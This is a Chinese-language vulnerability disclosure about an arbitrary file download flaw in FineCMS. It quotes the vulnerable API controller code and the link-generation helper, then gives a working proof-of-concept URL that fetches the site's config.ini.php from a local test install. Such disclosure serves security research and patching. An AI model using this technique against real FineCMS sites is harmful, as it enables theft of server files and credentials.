Finecms 任意文件下载漏洞
- 发表于
- Vulndb
Author:Sinner
漏洞文件:
\controllers\ApiController.php Line 54
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
public function downAction() { $data = fn_authcode(base64_decode($this->get('file')), 'DECODE'); $file = isset($data['finecms']) && $data['finecms'] ? $data['finecms'] : ''; if (empty($file)) { $this->msg(lang('a-mod-213')); } if (strpos($file, ':/')) { //远程 header("Location: $file"); } else { //本地 $file = str_replace('..', '', $file); $file = strpos($file, '/') === 0 ? APP_ROOT.$file : $file; if (!is_file($file)) { $this->msg(lang('a-mod-214') . '(#' . $file . ')'); }; header('Pragma: public'); header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT'); header('Cache-Control: no-store, no-cache, must-revalidate'); header('Cache-Control: pre-check=0, post-check=0, max-age=0'); header('Content-Transfer-Encoding: binary'); header('Content-Encoding: none'); header('Content-type: ' . strtolower(trim(substr(strrchr($file, '.'), 1, 10)))); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Content-length: ' . sprintf("%u", filesize($file))); readfile($file); exit; } } |
$file 可控。并不用去分析如何加密得来的,我们来看链接是怎么生成的:
找到/extensions/function.php Line 285
|
1 2 3 |
function downfile($url) { return url('api/down', array('file' => str_replace('=', '', base64_encode(fn_authcode(array('finecms' => $url), 'ENCODE'))))); } |
$url 参数为文件路径
我们本地直接调用这个函数 将我们想下载的文件路径作为参数就能得到下载链接
|
1 |
http://127.0.0.1//index.php?c=api&a=down&file=NDgwNTA0M2RFRXRkc1ZTaGNuczJBSjZTSk9KSDVTYnFqL251K0lNRjBQK0tla0FBTVpHM3dLbU8yVTNWaE1SYTRtRXRjUlQ3bDd4cGRQeVRKMGVlcDEvQjNRVlA4bTNnMi9SZDRDSjBOUQ |
为/config/config.ini.php
|
1 |
NDgwNTA0M2RFRXRkc1ZTaGNuczJBSjZTSk9KSDVTYnFqL251K0lNRjBQK0tla0FBTVpHM3dLbU8yVTNWaE1SYTRtRXRjUlQ3bDd4cGRQeVRKMGVlcDEvQjNRVlA4bTNnMi9SZDRDSjBOUQ |
原文连接:Finecms 任意文件下载漏洞
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
